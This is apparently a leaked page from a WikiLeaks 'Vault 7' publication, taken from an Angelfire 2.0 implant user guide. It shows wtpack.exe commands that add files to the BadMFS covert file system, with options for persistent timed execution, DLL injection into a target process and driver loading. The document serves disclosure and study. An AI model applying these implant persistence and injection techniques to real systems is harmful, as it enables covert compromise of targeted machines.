Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

SECRET//20341105
3.4 (S) Adding a File To The Covert File System (add
transitory file)
(S) To add a file to the BadMFS covert file system, you must create an “add” transitory
file. The file must be finalized to the installation binary, which will then be run on target.
Whenever files are added to the covert file system, a 3 digit number is appended to the
beginning of the file name to encode information about the file for internal Angelfire use.
In the cases of .exe's, .dll’s, and .sys files, an additional file is also created (with a similar
name) that contains the command line parameters to be passed to the .exe. To delete an
.exe or .sys file, both of the files matching the implant name should be deleted.
N.B. Multiple files can be added to an “add” transitory file.
Example creation of add transitory file:
wtpack.exe new add “add_transitory_file”
wtpack.exe update “add_transitory_file” –bp “BadMFS
location”
wtpack.exe update “add_transitory_file” –bin “file to
add” {sub-options}
3.4.1 (S) Sub-options for -bin
(S) There are several sub-options for the –bin option to add a binary file to BadMFS. The
following list contains all options available. N.B. While most of these are optional, some
are required depending on the type of binary being added to the covert store.
Sub-Option Potential Values Notes
-execp persistent execution
interval in minutes
-execd delay for initial
execution in seconds
-execa absolute execution
time
Must be in UTC. Format
of YYYY:MM:DD:HH:MM:SS
-inject target process for
.dll injection
For .DLL only. Must be
specified in that
case.
-dtype type for drivers (sys,
auto, boot)
For .SYS only. Default
value is ‘auto’
-cmdline command line options Must be the last
option. All contents
after this flag will
be added to the
command line. Command
lines for .dlls must
be of the following
format:
“env_var=variable
value”. This is to
support the NOD
persistence spec.
af+mainrepo+Angelfire 2.0 UserGuide 8 of 15
SECRET//20341105

e-Highlighter

Click to send permalink to address bar, or right-click to copy permalink.

Un-highlight all Un-highlight selectionu Highlight selectionh